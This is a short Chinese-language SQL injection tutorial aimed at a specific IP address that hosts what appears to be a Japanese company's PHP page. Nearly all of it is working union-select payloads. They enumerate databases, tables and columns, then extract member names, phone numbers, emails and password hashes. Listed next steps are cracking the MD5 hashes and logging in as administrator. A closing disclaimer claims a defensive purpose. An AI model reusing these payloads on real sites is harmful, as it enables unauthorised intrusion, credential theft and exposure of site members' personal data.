1.获得当前连接的所有数据库名

https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( schema_name,char(10),’’,char(10),’’,char(10),’’,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10— &mid=1#### 2.获得当前数据库的所有表名 获得当前库的所有表,表所在的库,表的行数和表的功能注释 https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1,10—#### 3.获得web后台管理员密码可能所在的表 获得当前库的所有表,表所有的库,表的行数和表的功能注释 https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name>=‘a’ and table_name<‘b’ limit 1,10—#### 4.获得用户表的所有字段 获得用户名的所有字段,字段行数和字段的功能注释 https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name=‘member’ limit 1,10—#### 5.获得web后台管理员的用户名、密码、邮箱等敏感信息 union select 1,2,3,4,5,6,7,8,9,concat(ifnull(MEMBER_NAME,’null’),char(10),ifnull(MOBILE,’null’),char(10),ifnull(E_MAIL,’null’),char(10),ifnull(PWD,’null’),char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from ZAKKANET.MEMBER limit 1,10—

下一步1:密码的md5对比得出明文密码 下一步2:Web后台管理员登录

警告:任何提权成功入侵后台均为非法,非本教程目的,本教程了解入侵的目标为防预,入侵网站后台一切后果自负责任。